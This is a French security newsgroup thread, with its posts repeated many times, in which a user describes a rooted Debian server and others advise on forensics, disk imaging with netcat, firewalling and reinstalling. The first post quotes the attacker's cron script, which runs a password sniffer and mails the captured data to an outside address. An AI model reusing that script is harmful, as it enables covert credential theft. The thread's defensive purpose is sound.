Je me suis apercu que ma debian s'etait fait rooter :(. J'ai amassé
quelques preuves :
tout d'abord j'ai touvé dans le repertoire /home/client des fichiers
permettant de se connecter a
ebay via lynx .... ayant les droits root :| (cela m'a mis la puce a
l'oreille)
J'ai commencé à chercher :
il y a un faux syslogd qui s'appelle en réalité syslogd{ESPACE} qui
tourne :
--------------------------------------
leguenr@buroplan:/etc/rc1.d$ "/sbin/syslogd "
[sebd]-> starting
error: you need to be root (your uid: 1001) to run me
--------------------------------------
--------------------------------------------------
Checking `lkm'... You have 2 process hidden for readdir command
You have 2 process hidden for ps command
Warning: Possible LKM Trojan installed
--------------------------------------------------
passage de rkhunter -> tout ok ! sauf :
--------------------------------------
* Application version scan
- Exim MTA 3.36 [ Unknown
]
- GnuPG 1.0.6 [ Old or
patched version ]
- Bind DNS 9.2.1 [ Unknown
]
- OpenSSL 0.9.7e [ OK ]
- Procmail MTA 3.22 [ OK ]
- OpenSSH 3.8.1p1 [ OK ]
--------------------------------------
J'ai aussi trouvé : un cron dans /etc/cron.daily/dnsquery
ce fichier contenait :
--------------------------------------
root@buroplan:/root# cat dnsquery
#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log > test
cat /usr/share/misc/blah/temp.log |uniq >> test
echo >/usr/share/misc/blah/temp.log
mail dumycs@yahoo.com -s "$(hostname -f)" < test
rm -rf test httpd.log
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A
---------------------------------------
pour information le fichier popauth en question etait un dsniff
le repertoir /usr/share/misc n'existe pas du moins pas vu de mon ls
il y'a pê un rootkit qui masque ce repertoire.
J'en suis la, j'ai killé les processus syslogd{ESPACE} et je l'ai
effacé mais
il est réapparu apres avoir rebooté. J'ai tenté de faire un
rapprochement
sur les dates de modification des fichiers mais il semblerait que
celles ci ait été modifiées.
J'ai retrouvé popauth et dnsquery avec comme user et group : 501.
cela m'a permit de faire un "find / -gid 501" pour trouver ces indices
! Bref,
Que dois-je faire ? La reinstallation complete n'est pas possible, du
moins pas pour l'instant
car je n'ai acces à cette machine que par ssh. Les données
compromises n'ont pas grande valeur
mais j'aimerai bien en savoir plus sur le comment !
Merci d'avance pour les informations que vous pourriez eventuellement
me donner :)
Que dois-je faire ? La reinstallation complete n'est pas possible, du moins pas pour l'instant car je n'ai acces à cette machine que par ssh.
Il y a trois problèmes bien distincts :
- trouver comment la machine a été attaquée : sauver le maximum de logs, que ce soit http, syslog etc... et essayer de trouver des traces de l'attaque.
- éviter que la machine serve de plateforme pour en attaquer d'autres : donc ne pas traîner pour faire ce qu'il faut
- se débarasser du bordel. Comme on n'a aucun moyen de savoir tout ce qui a été corrompu, une solution et une seule : la réinstallation. Il faudra que quelqu'un qui a un accès physique s'en charge. Chez un hébergeur, souvent, ils mettent un nouveau disque, l'ancien en esclave pour récupérer les données. Un petit coup de clamav pourra peut-être détecter quelques fichiers corrompus.
a++; JG
Bonjour,
Que dois-je faire ? La reinstallation complete n'est pas possible, du
moins pas pour l'instant car je n'ai acces à cette machine que par ssh.
Il y a trois problèmes bien distincts :
- trouver comment la machine a été attaquée : sauver le maximum de logs,
que ce soit http, syslog etc... et essayer de trouver des traces de
l'attaque.
- éviter que la machine serve de plateforme pour en attaquer d'autres :
donc ne pas traîner pour faire ce qu'il faut
- se débarasser du bordel. Comme on n'a aucun moyen de savoir tout ce
qui a été corrompu, une solution et une seule : la réinstallation. Il
faudra que quelqu'un qui a un accès physique s'en charge. Chez un
hébergeur, souvent, ils mettent un nouveau disque, l'ancien en esclave
pour récupérer les données. Un petit coup de clamav pourra peut-être
détecter quelques fichiers corrompus.
Que dois-je faire ? La reinstallation complete n'est pas possible, du moins pas pour l'instant car je n'ai acces à cette machine que par ssh.
Il y a trois problèmes bien distincts :
- trouver comment la machine a été attaquée : sauver le maximum de logs, que ce soit http, syslog etc... et essayer de trouver des traces de l'attaque.
- éviter que la machine serve de plateforme pour en attaquer d'autres : donc ne pas traîner pour faire ce qu'il faut
- se débarasser du bordel. Comme on n'a aucun moyen de savoir tout ce qui a été corrompu, une solution et une seule : la réinstallation. Il faudra que quelqu'un qui a un accès physique s'en charge. Chez un hébergeur, souvent, ils mettent un nouveau disque, l'ancien en esclave pour récupérer les données. Un petit coup de clamav pourra peut-être détecter quelques fichiers corrompus.
a++; JG
J1
Bonjour à tous,
Bonjour,
Que dois-je faire ? La reinstallation complete n'est pas possible, du moins pas pour l'instant car je n'ai acces à cette machine que par ssh.
Il y a trois problèmes bien distincts :
- trouver comment la machine a été attaquée : sauver le maximum de logs, que ce soit http, syslog etc... et essayer de trouver des traces de l'attaque.
A titre informatif, quelle version de debian tourne sur ce serveur? Disposait elle des dernières mises à jour debian? Si tel est le cas, penser à vérifier à deux fois la qualité du code accessible via le web. (php, asp, cgi...) Dans certains rootkit, un keylogger est installé et permet de recuperer les mots de passes ftp/ssh/telnet/et+ saisis suite à l'attaque, donc essayer tant que possible de mener les investigations hors web, ou alors être extremement prudent.
- éviter que la machine serve de plateforme pour en attaquer d'autres : donc ne pas traîner pour faire ce qu'il faut
En complément, sur tous (?) les switchs manageables il est possible de désactiver (puis réactiver) des ports ethernet. C'est une solution assez efficace pour éviter que l'attaquant ou toute autre personne connaissant la backdoor ne puisse venir utiliser le serveur.
- se débarasser du bordel. Comme on n'a aucun moyen de savoir tout ce qui a été corrompu, une solution et une seule : la réinstallation.
+1
En tout cas bon courage,
-- J1
Bonjour à tous,
Bonjour,
Que dois-je faire ? La reinstallation complete n'est pas possible, du
moins pas pour l'instant car je n'ai acces à cette machine que par ssh.
Il y a trois problèmes bien distincts :
- trouver comment la machine a été attaquée : sauver le maximum de logs,
que ce soit http, syslog etc... et essayer de trouver des traces de
l'attaque.
A titre informatif, quelle version de debian tourne sur ce serveur?
Disposait elle des dernières mises à jour debian?
Si tel est le cas, penser à vérifier à deux fois la qualité du code
accessible via le web. (php, asp, cgi...)
Dans certains rootkit, un keylogger est installé et permet de recuperer
les mots de passes ftp/ssh/telnet/et+ saisis suite à l'attaque, donc
essayer tant que possible de mener les investigations hors web, ou
alors être extremement prudent.
- éviter que la machine serve de plateforme pour en attaquer d'autres :
donc ne pas traîner pour faire ce qu'il faut
En complément, sur tous (?) les switchs manageables il est possible de
désactiver (puis réactiver) des ports ethernet. C'est une solution
assez efficace pour éviter que l'attaquant ou toute autre personne
connaissant la backdoor ne puisse venir utiliser le serveur.
- se débarasser du bordel. Comme on n'a aucun moyen de savoir tout ce
qui a été corrompu, une solution et une seule : la réinstallation.
Que dois-je faire ? La reinstallation complete n'est pas possible, du moins pas pour l'instant car je n'ai acces à cette machine que par ssh.
Il y a trois problèmes bien distincts :
- trouver comment la machine a été attaquée : sauver le maximum de logs, que ce soit http, syslog etc... et essayer de trouver des traces de l'attaque.
A titre informatif, quelle version de debian tourne sur ce serveur? Disposait elle des dernières mises à jour debian? Si tel est le cas, penser à vérifier à deux fois la qualité du code accessible via le web. (php, asp, cgi...) Dans certains rootkit, un keylogger est installé et permet de recuperer les mots de passes ftp/ssh/telnet/et+ saisis suite à l'attaque, donc essayer tant que possible de mener les investigations hors web, ou alors être extremement prudent.
- éviter que la machine serve de plateforme pour en attaquer d'autres : donc ne pas traîner pour faire ce qu'il faut
En complément, sur tous (?) les switchs manageables il est possible de désactiver (puis réactiver) des ports ethernet. C'est une solution assez efficace pour éviter que l'attaquant ou toute autre personne connaissant la backdoor ne puisse venir utiliser le serveur.
- se débarasser du bordel. Comme on n'a aucun moyen de savoir tout ce qui a été corrompu, une solution et une seule : la réinstallation.
+1
En tout cas bon courage,
-- J1
Nicob
On Wed, 30 Nov 2005 08:54:38 +0000, wrote:
Les données compromises n'ont pas grande valeur mais j'aimerai bien en savoir plus sur le comment !
Pour enquêter sérieusement, il faudrait avoir une image des disques. Si tu as du temps (et de la BP), un `cat /dev/hda$i | nc box 1234` du côté de la machine compromise et un `nc -vnlp 1234 > dump-$i.bin` du côté de ton autre machine te permettra d'obtenir une image binaire des partitions (dont swap !) où enquêter. Après, tu montes les partoches en read-only et hop, enquête classique (recherche des fichiers effacés, ...).
Dernière chose : si tu ne trouves pas le vecteur d'entrée, il est probable qu'une ré-install ne mènera qu'à une nouvelle compromission ...
Nicob
On Wed, 30 Nov 2005 08:54:38 +0000, contact@romainl.com wrote:
Les données compromises n'ont pas grande valeur
mais j'aimerai bien en savoir plus sur le comment !
Pour enquêter sérieusement, il faudrait avoir une image des disques. Si
tu as du temps (et de la BP), un `cat /dev/hda$i | nc box 1234` du côté
de la machine compromise et un `nc -vnlp 1234 > dump-$i.bin` du côté
de ton autre machine te permettra d'obtenir une image binaire des
partitions (dont swap !) où enquêter. Après, tu montes les partoches en
read-only et hop, enquête classique (recherche des fichiers effacés, ...).
Dernière chose : si tu ne trouves pas le vecteur d'entrée, il est
probable qu'une ré-install ne mènera qu'à une nouvelle compromission ...
Les données compromises n'ont pas grande valeur mais j'aimerai bien en savoir plus sur le comment !
Pour enquêter sérieusement, il faudrait avoir une image des disques. Si tu as du temps (et de la BP), un `cat /dev/hda$i | nc box 1234` du côté de la machine compromise et un `nc -vnlp 1234 > dump-$i.bin` du côté de ton autre machine te permettra d'obtenir une image binaire des partitions (dont swap !) où enquêter. Après, tu montes les partoches en read-only et hop, enquête classique (recherche des fichiers effacés, ...).
Dernière chose : si tu ne trouves pas le vecteur d'entrée, il est probable qu'une ré-install ne mènera qu'à une nouvelle compromission ...
Nicob
Francois Cartegnie
J'en suis la, j'ai killé les processus syslogd{ESPACE} et je l'ai effacé mais il est réapparu apres avoir rebooté. J'ai tenté de faire un
Il a peut etre pointé le daemon sur ce rootkit. A verifier. Au mieux, tu remplace ce fichier par un script qui logge le PPID, et qui dumpe le resultat du /proc/${PPID}/cmdline ou autre 'ps' dans un fichier, t'auras l'appelant, meme s'il disparait par la suite.
J'en suis la, j'ai killé les processus syslogd{ESPACE} et je l'ai
effacé mais
il est réapparu apres avoir rebooté. J'ai tenté de faire un
Il a peut etre pointé le daemon sur ce rootkit. A verifier.
Au mieux, tu remplace ce fichier par un script qui logge le PPID, et qui
dumpe le resultat du /proc/${PPID}/cmdline ou autre 'ps' dans un
fichier, t'auras l'appelant, meme s'il disparait par la suite.
J'en suis la, j'ai killé les processus syslogd{ESPACE} et je l'ai effacé mais il est réapparu apres avoir rebooté. J'ai tenté de faire un
Il a peut etre pointé le daemon sur ce rootkit. A verifier. Au mieux, tu remplace ce fichier par un script qui logge le PPID, et qui dumpe le resultat du /proc/${PPID}/cmdline ou autre 'ps' dans un fichier, t'auras l'appelant, meme s'il disparait par la suite.
octane
tcp 0 0 0.0.0.0:20012 0.0.0.0:* LISTEN 282/
ce port me parait curieux. Regarde qui ecoute derriere: fuser -nv tcp 20012
cat /usr/share/misc/blah/
j'irais faire un tour la dedans aussi, pour voir. Ne fais pas confiance non plus a tes programmes ls, ps etc.. pour faire la liste de ce repertoire, tu peux lancer un: cd /usr/share/misc tar cvf blah.tar blah/ Generalement, je dis bien generalement, le binaire tar n'est pas roote. Donc le tar t'affichera tous les fichiers. Si tu as une difference entre le ls et le tar, re-extrait le fichier ls d'une archive deb originelle: cd /tmp dpkg -X <archive>.deb . puis fait un diff du ls extrait et du /bin/ls (de memoire, je ne sais plus dans quel paquet debian est fourni /bin/ls)
Que dois-je faire ? La reinstallation complete n'est pas possible, du moins pas pour l'instant car je n'ai acces à cette machine que par ssh. Les données compromises n'ont pas grande valeur mais j'aimerai bien en savoir plus sur le comment !
Avant toute chose, lance des commandes iptables pour n'autoriser les connections ssh que depuis _ta_ machine. Bloque tout le reste. Il est inutile que le pirate dispose d'aces ou de fuite d'information de ta machine.
Apres, investigue. Mais je crois que la reinstalle s'impose. Dis toi que si un pirate est venu, un deuxieme, beaucoup plus discret que le premier peut etre egalement passe. --
tcp 0 0 0.0.0.0:20012 0.0.0.0:*
LISTEN 282/
ce port me parait curieux. Regarde qui ecoute derriere:
fuser -nv tcp 20012
cat /usr/share/misc/blah/
j'irais faire un tour la dedans aussi, pour voir.
Ne fais pas confiance non plus a tes programmes ls,
ps etc..
pour faire la liste de ce repertoire, tu peux lancer un:
cd /usr/share/misc
tar cvf blah.tar blah/
Generalement, je dis bien generalement, le binaire
tar n'est pas roote. Donc le tar t'affichera tous les
fichiers.
Si tu as une difference entre le ls et le tar, re-extrait
le fichier ls d'une archive deb originelle:
cd /tmp
dpkg -X <archive>.deb .
puis fait un diff du ls extrait et du /bin/ls
(de memoire, je ne sais plus dans quel paquet debian
est fourni /bin/ls)
Que dois-je faire ? La reinstallation complete n'est pas
possible, du moins pas pour l'instant
car je n'ai acces à cette machine que par ssh. Les données
compromises n'ont pas grande valeur
mais j'aimerai bien en savoir plus sur le comment !
Avant toute chose, lance des commandes iptables pour
n'autoriser les connections ssh que depuis _ta_
machine. Bloque tout le reste. Il est inutile que le
pirate dispose d'aces ou de fuite d'information de ta
machine.
Apres, investigue. Mais je crois que la reinstalle
s'impose. Dis toi que si un pirate est venu, un
deuxieme, beaucoup plus discret que le premier peut
etre egalement passe.
--
ce port me parait curieux. Regarde qui ecoute derriere: fuser -nv tcp 20012
cat /usr/share/misc/blah/
j'irais faire un tour la dedans aussi, pour voir. Ne fais pas confiance non plus a tes programmes ls, ps etc.. pour faire la liste de ce repertoire, tu peux lancer un: cd /usr/share/misc tar cvf blah.tar blah/ Generalement, je dis bien generalement, le binaire tar n'est pas roote. Donc le tar t'affichera tous les fichiers. Si tu as une difference entre le ls et le tar, re-extrait le fichier ls d'une archive deb originelle: cd /tmp dpkg -X <archive>.deb . puis fait un diff du ls extrait et du /bin/ls (de memoire, je ne sais plus dans quel paquet debian est fourni /bin/ls)
Que dois-je faire ? La reinstallation complete n'est pas possible, du moins pas pour l'instant car je n'ai acces à cette machine que par ssh. Les données compromises n'ont pas grande valeur mais j'aimerai bien en savoir plus sur le comment !
Avant toute chose, lance des commandes iptables pour n'autoriser les connections ssh que depuis _ta_ machine. Bloque tout le reste. Il est inutile que le pirate dispose d'aces ou de fuite d'information de ta machine.
Apres, investigue. Mais je crois que la reinstalle s'impose. Dis toi que si un pirate est venu, un deuxieme, beaucoup plus discret que le premier peut etre egalement passe. --
Michoko
Je me suis apercu que ma debian s'etait fait rooter :(. J'ai amassé quelques preuves :
bonjour,
Comme j'envisage de passer chez moi de Windows à Linux j'aimerais savoir si c'est une machine personnelle (PC perso au domicile) ou un serveur en entreprise qui s'est fait rooter ? merci
michoko
Je me suis apercu que ma debian s'etait fait rooter :(. J'ai amassé
quelques preuves :
bonjour,
Comme j'envisage de passer chez moi de Windows à Linux j'aimerais savoir
si c'est une machine personnelle (PC perso au domicile) ou un serveur en
entreprise qui s'est fait rooter ?
merci
Je me suis apercu que ma debian s'etait fait rooter :(. J'ai amassé quelques preuves :
bonjour,
Comme j'envisage de passer chez moi de Windows à Linux j'aimerais savoir si c'est une machine personnelle (PC perso au domicile) ou un serveur en entreprise qui s'est fait rooter ? merci
michoko
newstel
Le Sat, 03 Dec 2005 21:21:38 +0000, Michoko a écrit :
Je me suis apercu que ma debian s'etait fait rooter :(. J'ai amassé quelques preuves :
bonjour,
Comme j'envisage de passer chez moi de Windows à Linux
ouhlàlàlàlà ! restez sous Windows. C'est beaucoup moins risqué ;-)
Le Sat, 03 Dec 2005 21:21:38 +0000, Michoko a écrit :
Je me suis apercu que ma debian s'etait fait rooter :(. J'ai amassé
quelques preuves :
bonjour,
Comme j'envisage de passer chez moi de Windows à Linux
ouhlàlàlàlà ! restez sous Windows. C'est beaucoup moins risqué ;-)
Le Sat, 03 Dec 2005 21:21:38 +0000, Michoko a écrit :
Je me suis apercu que ma debian s'etait fait rooter :(. J'ai amassé quelques preuves :
bonjour,
Comme j'envisage de passer chez moi de Windows à Linux
ouhlàlàlàlà ! restez sous Windows. C'est beaucoup moins risqué ;-)
JKB
Le 03-12-2005, à propos de Re: Je suis roote que faire ?, Michoko écrivait dans fr.comp.securite :
Je me suis apercu que ma debian s'etait fait rooter :(. J'ai amassé quelques preuves :
bonjour,
Comme j'envisage de passer chez moi de Windows à Linux j'aimerais savoir si c'est une machine personnelle (PC perso au domicile) ou un serveur en entreprise qui s'est fait rooter ?
Quelle différence ? Je maintiens personnellement un tas de serveurs sous Debien/testing (vous savez, la trouée, parce que chez debian, ils sortent une cassée, une trouée et une obsolète) et je n'ai _jamais_ été rooté. Pour cela, il existe quelques règles simples. La sécurité ne s'apprend pas seul dans son coin, mais avec une machine, la doc, un vrai admin et un réseau hostile.
Par ailleurs, on ne met sur le réseau qu'une machine dont on connaît absolument toutes les caractéristiques (logicielles, en particulier les daemons qui tournent et ce qui est dans (x)inetd. D'ailleurs préférer xinetd à inetd)... Un peu de paranoia pour le reste (portmap, fail2ban...) et le tour est généralement joué.
Cordialement,
JKB
Le 03-12-2005, à propos de
Re: Je suis roote que faire ?,
Michoko écrivait dans fr.comp.securite :
Je me suis apercu que ma debian s'etait fait rooter :(. J'ai amassé
quelques preuves :
bonjour,
Comme j'envisage de passer chez moi de Windows à Linux j'aimerais savoir
si c'est une machine personnelle (PC perso au domicile) ou un serveur en
entreprise qui s'est fait rooter ?
Quelle différence ? Je maintiens personnellement un tas de serveurs
sous Debien/testing (vous savez, la trouée, parce que chez debian,
ils sortent une cassée, une trouée et une obsolète) et je n'ai
_jamais_ été rooté. Pour cela, il existe quelques règles simples. La
sécurité ne s'apprend pas seul dans son coin, mais avec une machine,
la doc, un vrai admin et un réseau hostile.
Par ailleurs, on ne met sur le réseau qu'une machine dont on connaît
absolument toutes les caractéristiques (logicielles, en particulier
les daemons qui tournent et ce qui est dans (x)inetd. D'ailleurs
préférer xinetd à inetd)... Un peu de paranoia pour le reste
(portmap, fail2ban...) et le tour est généralement joué.
Le 03-12-2005, à propos de Re: Je suis roote que faire ?, Michoko écrivait dans fr.comp.securite :
Je me suis apercu que ma debian s'etait fait rooter :(. J'ai amassé quelques preuves :
bonjour,
Comme j'envisage de passer chez moi de Windows à Linux j'aimerais savoir si c'est une machine personnelle (PC perso au domicile) ou un serveur en entreprise qui s'est fait rooter ?
Quelle différence ? Je maintiens personnellement un tas de serveurs sous Debien/testing (vous savez, la trouée, parce que chez debian, ils sortent une cassée, une trouée et une obsolète) et je n'ai _jamais_ été rooté. Pour cela, il existe quelques règles simples. La sécurité ne s'apprend pas seul dans son coin, mais avec une machine, la doc, un vrai admin et un réseau hostile.
Par ailleurs, on ne met sur le réseau qu'une machine dont on connaît absolument toutes les caractéristiques (logicielles, en particulier les daemons qui tournent et ce qui est dans (x)inetd. D'ailleurs préférer xinetd à inetd)... Un peu de paranoia pour le reste (portmap, fail2ban...) et le tour est généralement joué.
Cordialement,
JKB
FAb
"" writes:
Je me suis apercu que ma debian s'etait fait rooter :(. J'ai amassé quelques preuves :
tout d'abord j'ai touvé dans le repertoire /home/client des fichiers permettant de se connecter a ebay via lynx .... ayant les droits root :| (cela m'a mis la puce a l'oreille) [...]
Que dois-je faire ? La reinstallation complete n'est pas possible, du moins pas pour l'instant car je n'ai acces à cette machine que par ssh. Les données compromises n'ont pas grande valeur mais j'aimerai bien en savoir plus sur le comment !
Bizarre que personne ne l'ai dit, mais je vous conseillerais de commencer par porter plainte auprès de la gendarmerie histoire de dégager votre responsabilité au cas où votre machine servirait de relais pour en attaquer d'autres ou de serveurs ftp warez/pédophilie etc...
Faire une image complète des partitions en RO sur une autre. Et en suivant couper les accès réseaux autres que le votre (iptables).
Je crois qu'il est conseillé de garder ces images un temps pour ne pas gêner l'enquête de gendarmerie s'il y avait tout en remettant la machine propre en prod.
Dans un magazine «misc» ils ont très bien parlé de tout ça. Les mots clés sont Scan of the month (SotM), analyse post-mortem et éventuellement Honeypot. Il y a des pro qui passent régulièrement sur ce ng, ils risquent de vous en dire plus.
Merci d'avance pour les informations que vous pourriez eventuellement me donner :)
Il y a des messages très instructifs dans les archives de ce présent ng à ce sujet.
Je me suis apercu que ma debian s'etait fait rooter :(. J'ai amassé
quelques preuves :
tout d'abord j'ai touvé dans le repertoire /home/client des fichiers
permettant de se connecter a
ebay via lynx .... ayant les droits root :| (cela m'a mis la puce a
l'oreille)
[...]
Que dois-je faire ? La reinstallation complete n'est pas possible, du
moins pas pour l'instant
car je n'ai acces à cette machine que par ssh. Les données
compromises n'ont pas grande valeur
mais j'aimerai bien en savoir plus sur le comment !
Bizarre que personne ne l'ai dit, mais je vous conseillerais de commencer par
porter plainte auprès de la gendarmerie histoire de dégager votre responsabilité
au cas où votre machine servirait de relais pour en attaquer d'autres ou de
serveurs ftp warez/pédophilie etc...
Faire une image complète des partitions en RO sur une autre.
Et en suivant couper les accès réseaux autres que le votre (iptables).
Je crois qu'il est conseillé de garder ces images un temps pour ne pas gêner
l'enquête de gendarmerie s'il y avait tout en remettant la machine propre en
prod.
Dans un magazine «misc» ils ont très bien parlé de tout ça.
Les mots clés sont Scan of the month (SotM), analyse post-mortem
et éventuellement Honeypot.
Il y a des pro qui passent régulièrement sur ce ng, ils risquent de vous en
dire plus.
Merci d'avance pour les informations que vous pourriez eventuellement
me donner :)
Il y a des messages très instructifs dans les archives de ce présent ng à ce
sujet.
Je me suis apercu que ma debian s'etait fait rooter :(. J'ai amassé quelques preuves :
tout d'abord j'ai touvé dans le repertoire /home/client des fichiers permettant de se connecter a ebay via lynx .... ayant les droits root :| (cela m'a mis la puce a l'oreille) [...]
Que dois-je faire ? La reinstallation complete n'est pas possible, du moins pas pour l'instant car je n'ai acces à cette machine que par ssh. Les données compromises n'ont pas grande valeur mais j'aimerai bien en savoir plus sur le comment !
Bizarre que personne ne l'ai dit, mais je vous conseillerais de commencer par porter plainte auprès de la gendarmerie histoire de dégager votre responsabilité au cas où votre machine servirait de relais pour en attaquer d'autres ou de serveurs ftp warez/pédophilie etc...
Faire une image complète des partitions en RO sur une autre. Et en suivant couper les accès réseaux autres que le votre (iptables).
Je crois qu'il est conseillé de garder ces images un temps pour ne pas gêner l'enquête de gendarmerie s'il y avait tout en remettant la machine propre en prod.
Dans un magazine «misc» ils ont très bien parlé de tout ça. Les mots clés sont Scan of the month (SotM), analyse post-mortem et éventuellement Honeypot. Il y a des pro qui passent régulièrement sur ce ng, ils risquent de vous en dire plus.
Merci d'avance pour les informations que vous pourriez eventuellement me donner :)
Il y a des messages très instructifs dans les archives de ce présent ng à ce sujet.
Romain Le Guen
Bonne chance.
FAbrice
Michoko
Comme j'envisage de passer chez moi de Windows à Linux j'aimerais savoir si c'est une machine personnelle (PC perso au domicile) ou un serveur en entreprise qui s'est fait rooter ?
Quelle différence ?
Car je pense qu'un serveur d'entreprise, connecté en permanence à Internet, à plus de chances de se faire attaquer que la machine personnelle d'un particulier à son domicile.
Je maintiens personnellement un tas de serveurs
sous Debien/testing (vous savez, la trouée, parce que chez debian, ils sortent une cassée, une trouée et une obsolète)
Dit comme ça, ca n'encourage pas à passer sous Debian.
et je n'ai _jamais_ été rooté. Pour cela, il existe quelques règles simples. La sécurité ne s'apprend pas seul dans son coin, mais avec une machine, la doc, un vrai admin et un réseau hostile.
Par ailleurs, on ne met sur le réseau qu'une machine dont on connaît absolument toutes les caractéristiques (logicielles, en particulier les daemons qui tournent et ce qui est dans (x)inetd. D'ailleurs préférer xinetd à inetd)... Un peu de paranoia pour le reste (portmap, fail2ban...) et le tour est généralement joué.
Ben oui, mais pour ma machine perso sous Linux, à part respecter les règles basiques bien connues (pas de connexion en root, iptables ou autre, ...), qu'est-ce que je dois faire de plus ?
Michoko
Comme j'envisage de passer chez moi de Windows à Linux j'aimerais savoir
si c'est une machine personnelle (PC perso au domicile) ou un serveur en
entreprise qui s'est fait rooter ?
Quelle différence ?
Car je pense qu'un serveur d'entreprise, connecté en permanence à
Internet, à plus de chances de se faire attaquer que la machine
personnelle d'un particulier à son domicile.
Je maintiens personnellement un tas de serveurs
sous Debien/testing (vous savez, la trouée, parce que chez debian,
ils sortent une cassée, une trouée et une obsolète)
Dit comme ça, ca n'encourage pas à passer sous Debian.
et je n'ai
_jamais_ été rooté. Pour cela, il existe quelques règles simples. La
sécurité ne s'apprend pas seul dans son coin, mais avec une machine,
la doc, un vrai admin et un réseau hostile.
Par ailleurs, on ne met sur le réseau qu'une machine dont on connaît
absolument toutes les caractéristiques (logicielles, en particulier
les daemons qui tournent et ce qui est dans (x)inetd. D'ailleurs
préférer xinetd à inetd)... Un peu de paranoia pour le reste
(portmap, fail2ban...) et le tour est généralement joué.
Ben oui, mais pour ma machine perso sous Linux, à part respecter les
règles basiques bien connues (pas de connexion en root, iptables ou
autre, ...), qu'est-ce que je dois faire de plus ?
Comme j'envisage de passer chez moi de Windows à Linux j'aimerais savoir si c'est une machine personnelle (PC perso au domicile) ou un serveur en entreprise qui s'est fait rooter ?
Quelle différence ?
Car je pense qu'un serveur d'entreprise, connecté en permanence à Internet, à plus de chances de se faire attaquer que la machine personnelle d'un particulier à son domicile.
Je maintiens personnellement un tas de serveurs
sous Debien/testing (vous savez, la trouée, parce que chez debian, ils sortent une cassée, une trouée et une obsolète)
Dit comme ça, ca n'encourage pas à passer sous Debian.
et je n'ai _jamais_ été rooté. Pour cela, il existe quelques règles simples. La sécurité ne s'apprend pas seul dans son coin, mais avec une machine, la doc, un vrai admin et un réseau hostile.
Par ailleurs, on ne met sur le réseau qu'une machine dont on connaît absolument toutes les caractéristiques (logicielles, en particulier les daemons qui tournent et ce qui est dans (x)inetd. D'ailleurs préférer xinetd à inetd)... Un peu de paranoia pour le reste (portmap, fail2ban...) et le tour est généralement joué.
Ben oui, mais pour ma machine perso sous Linux, à part respecter les règles basiques bien connues (pas de connexion en root, iptables ou autre, ...), qu'est-ce que je dois faire de plus ?
